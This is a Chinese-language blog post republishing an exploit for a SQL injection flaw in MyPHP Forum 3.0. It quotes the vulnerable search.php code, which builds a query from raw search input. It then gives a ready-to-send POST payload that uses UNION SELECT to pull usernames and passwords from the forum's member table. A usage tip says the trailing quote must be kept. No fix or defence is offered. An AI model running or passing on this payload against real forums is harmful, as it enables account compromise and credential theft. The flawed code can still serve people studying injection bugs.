MyPHP Forum | CNXCT小组的博客

MyPHP Forum <= 3.0 (Final) 远程SQL注射攻击

Posted by CFC4N on 2008/01/04 Leave a comment (0) Go to comments

MyPHP Forum v3.0 (Final) And Maybe Lower Multiple Sql Injection Vulnerabilities (Mq=Off/On)

Related Codes: search.php; line 14:

if($_POST['submit']) {
	$searchtext = $_POST['searchtext'];
	$searchuser = $_POST['searchuser'];

	if(!strstr($searchtext, '"')) {
		$keywords = explode(" ", $searchtext);
		for($i = 0; $i < count($keywords); $i++) {
			if($sqladdon != "") {
				$sqladdon .= " AND p.message LIKE '%$keywords[$i]%'";
			} else {
				$sqladdon .= "p.message LIKE '%$keywords[$i]%'";
			}
		}
	} else {
		$phrase = trim(stripslashes(strstr($searchtext, '"')));
		$quotesarr = explode('"', $phrase);
		$quotes = count($quotesarr);
		$phrasecount = $quotes - (count(explode('" "', $phrase)) + 1);

		for($i = 0; $i < $quotes; $i++) {
			if($i != 0 && $i != $quotes - 1) {
				if($phraseoff != "yes") {
					$phraselist .= "$quotesarr[$i]|";
					$phraseoff = "yes";
				} else {
					$phraseoff = "no";
				}
			}
		}

		$phrasearr = explode("|", $phraselist);
		$phrases = count($phrasearr) - 1;

		for($i = 0; $i < $phrases; $i++) {
			if($sqladdon != "") {
				$sqladdon .= " AND p.message LIKE '%$phrasearr[$i]%'";
			} else {
				$sqladdon .= "p.message LIKE '%$phrasearr[$i]%'";
			}
		}

		$newsearchtxt = trim(str_replace("$phrase", "", stripslashes($searchtext)));

		if($newsearchtxt != "") {
			$keywords = explode(" ", $newsearchtxt);
		}

		for($i = 0; $i < count($keywords); $i++) {
			if($sqladdon != "") {
				$sqladdon .= " AND p.message LIKE '%$keywords[$i]%'";
			} else {
				$sqladdon .= "p.message LIKE '%$keywords[$i]%'";
			}
		}
	}

	if($searchuser != "") {
		if($sqladdon != "") {
				$sqladdon .= " AND p.author LIKE '%$searchuser%'";
			} else {
				$sqladdon .= "p.author LIKE '%$searchuser%'";
			}
	}

	if($sqladdon != "" ) {
		search_header();
		$ttnum = 1;		// Now the Vulnerable Query =)
		$query = mysql_query("SELECT t.*, f.name AS forum FROM $db_post p, $db_topic t, $db_forum f WHERE $sqladdon AND t.tid=p.tid AND f.fid=t.fid") or die(mysql_error());

"""

POST

submit=Search&searchtext=%'/**/UNION/**/SELECT/**/0,0,0,concat('<BR/><h3>-=ParadoxGotThisOne=-</h3><BR/><h4>Username:',username,'<BR/>Password:',password,'</h4>'),0,0,0,0,0,0/**/FROM/**/[Prefix]_member/**/WHERE/**/uid=[Id]/*"

注意：最后一个”双引号必须带着！
适用版本：MyPHP Forum v3.0

随机日志

所谓技术

← PHP和XSS跨站攻击(老话题了)

PHP中UTF-8的困扰,还有可恶的BOM.. →

发表评论

CNXCT小组的博客

技术这个东西如同一个圆 ,刚开始的时候我们就如同站在圆心,一旦投入学习下去 ,圆就慢慢变大 ,圆的边缘以外也就会越来越大,接触的多了知道的多了, 就会发现自己真的很无知!

MyPHP Forum <= 3.0 (Final) 远程SQL注射攻击

随机日志

0 评论.

Leave a Reply

Categories

我的微博

最新文章

随机博文

Search by Tags!

博文归档

Meta

CNXCT小组的博客

技术这个东西如同一个圆 ,刚开始的时候我们就如同站在圆心,一旦投入学习下去 ,圆就慢慢变大 ,圆的边缘以外也就会越来越大,接触的多了 知道的多了, 就会发现自己真的很无知!

MyPHP Forum <= 3.0 (Final) 远程SQL注射攻击

随机日志

0 评论.

Leave a Reply

Categories

我的微博

最新文章

随机博文

Search by Tags!

博文归档

Meta

技术这个东西如同一个圆 ,刚开始的时候我们就如同站在圆心,一旦投入学习下去 ,圆就慢慢变大 ,圆的边缘以外也就会越来越大,接触的多了知道的多了, 就会发现自己真的很无知!